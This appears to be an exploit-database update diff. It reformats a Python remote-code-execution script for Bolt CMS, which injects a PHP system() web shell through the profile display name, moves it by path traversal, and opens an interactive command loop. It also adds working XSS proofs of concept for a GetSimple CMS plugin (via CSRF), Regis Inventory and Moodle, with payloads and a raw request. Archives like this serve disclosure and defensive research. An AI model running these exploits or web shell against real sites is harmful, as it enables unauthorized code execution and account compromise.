DB: 2021-03-27

4 changes to exploits/shellcodes

GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
Moodle 3.10.3 - 'label' Persistent Cross Site Scripting

exploits/php/webapps/48296.py

@@ -7,11 +7,6 @@
 # Tested on: Linux
 # CVE : not-yet-0day
 
-# last version
-
-#  p0c
-
-
 #!/usr/bin/python
 
 import requests
@@ -20,37 +15,26 @@ import warnings
 import re
 import os
 from bs4 import BeautifulSoup
-from colorama import init
-from termcolor import colored
-
-init()
-
+from colorama import init 
+from termcolor import colored 
+  
+init() 
+#pip install -r requirements.txt
 print(colored('''
- ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄
- ▄▄▄▄▄▄▄▄▄▄▄
-▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌
-▐░░▌▐░░░░░░░░░░░▌
-▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌
-▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀
-▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌
-▐░▌▐░▌▐░▌
-▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌
-▐░▌▐░█▄▄▄▄▄▄▄▄▄
-▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌
- ▐░▌▐░░░░░░░░░░░▌
-▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌
-▀▀▀▀▀▀▀▀▀█░▌
-▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌
-       ▐░
-▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌
-▄▄▄▄▄▄▄▄▄█░▌
-▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌
-▐░▌▐░░░░░░░░░░░▌
- ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀
- ▀▀▀▀▀▀▀▀▀▀▀
+ ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
+▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
+▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
+▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
+▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
+▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
+▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
+▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
+▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
+▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
+ ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀
 
 Pre Auth rce with low credintanl
-By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
+#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
 
 
 
@@ -65,8 +49,7 @@ password = sys.argv[3]
 
 
 request = requests.session()
-print((colored("[+] Retrieving CSRF token to submit the login
-form","green")))
+print((colored("[+] Retrieving CSRF token to submit the login form","green")))
 page = request.get(url+"/bolt/login")
 html_content = page.text
 soup = BeautifulSoup(html_content, 'html.parser')
@@ -87,15 +70,15 @@ print((colored("[+] Login token is : {0}","green")).format(token))
 aaa = request.get(url+"/bolt/profile")
 soup0 = BeautifulSoup(aaa.content, 'html.parser')
 token0 = soup0.findAll('input')[6].get("value")
-data_profile = {
-"user_profile[password][first]":"password",
-"user_profile[password][second]":"password",
-"user_profile[email]":"a@a.com",
-"user_profile[displayname]":"<?php system($_GET['test']);?>",
-"user_profile[save]":"",
-"user_profile[_token]":token0
+data_profile = { 
+	"user_profile[password][first]":"password",
+	"user_profile[password][second]":"password",
+	"user_profile[email]":"a@a.com",
+	"user_profile[displayname]":"<?php system($_GET['test']);?>",
+	"user_profile[save]":"",
+	"user_profile[_token]":token0
 
-}
+		}
 profile = request.post(url+'/bolt/profile',data_profile)
 
 
@@ -113,55 +96,49 @@ tables = soup2.find_all('span', class_ = 'entry disabled')
 
 
 print((colored("[+] SESSION INJECTION ","green")))
-for all_tables in tables:
-
-f= open("session.txt","a+")
-f.write(all_tables.text+"\n")
-f.close()
-num_lines = sum(1 for line in open('session.txt'))
-
-renamePostData = {
-"namespace": "root",
-"parent": "/app/cache/.sessions",
-"oldname": all_tables.text,
-"newname": "../../../public/files/test{}.php".format(num_lines),
-"token": csrf
-  }
-rename = request.post(url+"/async/folder/rename", renamePostData)
+for all_tables in tables: 
+	
+	f= open("session.txt","a+")
+	f.write(all_tables.text+"\n")
+	f.close()
+	num_lines = sum(1 for line in open('session.txt'))
+	
+	renamePostData = {
+		"namespace": "root",
+		"parent": "/app/cache/.sessions",
+		"oldname": all_tables.text,
+		"newname": "../../../public/files/test{}.php".format(num_lines),
+		"token": csrf
+	   }
+	rename = request.post(url+"/async/folder/rename", renamePostData)
+	
 
 
 
+	try:
+		url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
 
-try:
-url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
-
-rev = requests.get(url1).text
-r1 = re.findall('php',rev)
-
-r2 = r1[0]
-if r2 == "php" :
-fileINJ = "test{}".format(num_lines)
-
-print((colored("[+] FOUND  : "+fileINJ,"green")))
-
-except IndexError:
-print((colored("[-] Not found.","red")))
+		rev = requests.get(url1).text
+		r1 = re.findall('php',rev)
+		
+		r2 = r1[0]
+		if r2 == "php" : 
+			fileINJ = "test{}".format(num_lines)
+			
+			print((colored("[+] FOUND  : "+fileINJ,"green")))
+		
+	except IndexError:
+		print((colored("[-] Not found.","red")))
 
 new_name = 0
 while new_name != 'quit':
-inputs = input(colored("Enter OS command , for exit 'quit' :
-","green","on_red"))
-if inputs == "quit" :
-exit()
-else:
-a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
-aa = a.text
-r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
+	inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
+	if inputs == "quit" :
+		exit()
+	else:
+		a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
+		aa = a.text
+		r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
 
 
-print((r11)[0])
-
-
-
-
-Greetz to : all my friends
+		print((r11)[0])

exploits/php/webapps/49712.html

@@ -0,0 +1,21 @@
+# Exploit Title: GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS
+# Exploit Author: Abhishek Joshi 
+# Date: March 25, 2021
+# Vendor Homepage: http://get-simple.info/extend/plugin/custom-js/1267 / http://get-simple.info/download
+# Software Link: http://get-simple.info/extend/export/5260/1267/custom-js.zip
+# Version: 0.1 
+# Tested On: Windows 10 Pro + XAMPP + PHP Version 7.4.10
+# Tested against: Firefox 78.7.0esr (64-bit)
+
+# Vulnerability Description:
+# Cross-Site Request Forgery (CSRF) vulnerability in Custom JS v0.1 plugin for GetSimple CMS allows remote attackers to inject arbitrary client-side script code into every webpage hosted on the CMS (Persistent Cross-Site Scripting), when an authenticated admin visiting a third-party site.
+
+## CSRF POST Form Method
+<html><body>
+    <form action="http://mygetsimplecms.local/admin/load.php?id=CustomJSPlugin" method="POST">
+      <input type="hidden" name="customjs_url_content" value="">
+      <input type="hidden" name="customjs_js_content" value="alert('Hello Abhishek Joshi from CSRF --> XSS all the things!')">
+      <input type="hidden" name="submit" value="Save Settings">
+      <input type="submit" value="Submit request">
+    </form>
+</body></html>

exploits/php/webapps/49713.txt

@@ -0,0 +1,22 @@
+# Title: Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS
+# Exploit Author: George Tsimpidas
+# Date: 2021-03-25
+# Vendor Homepage: www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/regis_inventory.zip
+# Version : 1.0.0
+# Tested on: Kali Linux 2020.4
+# Category: Webapp
+
+# Description
+
+Regis Inventory And Monitoring System, suffers from a stored cross site scripting on Item's List Category
+
+#PoC
+
+1. Login as admin : http://localhost/regis_inventory/index.php
+2. Visit : http://localhost/regis_inventory/item.php
+3. Click add a New Item and input your payload on "Generic Name" textbox.
+
+Payload : <script>alert("XSS")</script>
+
+4. After inputting the Item values and submitting the form, it will trigger an XSS pop-up

exploits/php/webapps/49714.txt

@@ -0,0 +1,50 @@
+# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
+# Date: 25.03.2021
+# Author: Vincent666 ibn Winnie
+# Software Link: https://moodle.org/
+# Tested on: Windows 10
+# Web Browser: Mozilla Firefox
+# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
+
+Choose a role : Student (example)
+Open calendar :
+https://school.localhost/calendar/view.php?view=month
+
+Create new event:
+Example:
+Event Title "Test"
+Description :Choose Insert Video File and choose Video:
+Video Source Url you can paste video link from youtube
+
+And open Subtitles and Captions:
+Subtitle track URL use video link from youtube
+Field Label : There is we can use xss code:
+
+<img src="1" onerror="alert(1)" />
+
+or try in base64
+
+<embed src="data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik7PC9zY3JpcHQ+"
+type="image/svg+xml" AllowScriptAccess="always"></embed>
+
+Insert Media and save this.
+Open event and get stored xss.
+
+POST:
+
+https://school.localhost/lib/ajax/service.php?sesskey=vCHlHS7oIl&info=core_calendar_submit_create_update_form
+Host: school.localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0
+Accept: application/json, text/javascript, */*; q=0.01
+Accept-Language: en-US;q=0.5,en;q=0.3
+Accept-Encoding: gzip, deflate, br
+Content-Type: application/json
+X-Requested-With: XMLHttpRequest
+Content-Length: 996
+Origin: https://school.localhost
+Connection: keep-alive
+Referer: https://school.localhost/calendar/view.php?view=month
+Cookie: MoodleSession=4ea0036558425526decc096ed375b886;
+EU_COOKIE_LAW_CONSENT=true
+
+[{"index":0,"methodname":"core_calendar_submit_create_update_form","args":{"formdata":"id=0&userid=56&modulename=&instance=0&visible=1&eventtype=user&sesskey=vCHlHS7oIl&_qf__core_calendar_local_event_forms_create=1&mform_showmore_id_general=1&name=test&timestart%5Bday%5D=25&timestart%5Bmonth%5D=3&timestart%5Byear%5D=2021&timestart%5Bhour%5D=10&timestart%5Bminute%5D=4&description%5Btext%5D=%3Cp%20dir%3D%22ltr%22%20style%3D%22text-align%3A%20left%3B%22%3E%26nbsp%3B%3Cvideo%20controls%3D%22true%22%3E%3Csource%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%3E%3Ctrack%20src%3D%22https%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%22%20kind%3D%22subtitles%22%20srclang%3D%22en%22%20label%3D%22%3Cimg%20src%3D%26quot%3B1%26quot%3B%20onerror%3D%26quot%3Balert(1)%26quot%3B%20%2F%3E%22%3Ehttps%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DeWMB5YKzUSA%3C%2Fvideo%3E%26nbsp%3B%3Cbr%3E%3C%2Fp%3E&description%5Bformat%5D=1&description%5Bitemid%5D=495874277&location=&duration=0"}}]

files_exploits.csv

@@ -43892,4 +43892,7 @@ id,file,description,date,author,type,platform,port
 49708,exploits/hardware/webapps/49708.txt,"Linksys EA7500 2.0.8.194281 - Cross-Site Scripting",2021-03-25,MiningOmerta,webapps,hardware,
 49709,exploits/hardware/webapps/49709.txt,"Genexis Platinum-4410 P4410-V2-1.31A - 'start_addr' Persistent Cross-Site Scripting",2021-03-25,"Jithin KS",webapps,hardware,
 49711,exploits/php/webapps/49711.py,"Dolibarr ERP/CRM 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE)",2021-03-25,"Andrea Gonzalez",webapps,php,
+49712,exploits/php/webapps/49712.html,"GetSimple CMS Custom JS Plugin 0.1 - CSRF to Persistent XSS",2021-03-26,"Abhishek Joshi",webapps,php,
+49713,exploits/php/webapps/49713.txt,"Regis Inventory And Monitoring System 1.0 - 'Item List' Stored XSS",2021-03-26,"George Tsimpidas",webapps,php,
+49714,exploits/php/webapps/49714.txt,"Moodle 3.10.3 - 'label' Persistent Cross Site Scripting",2021-03-26,Vincent666,webapps,php,
 49665,exploits/php/webapps/49665.txt,"rConfig 3.9.6 - Arbitrary File Upload to Remote Code Execution (Authenticated)",2021-03-18,"Murat ŞEKER",webapps,php,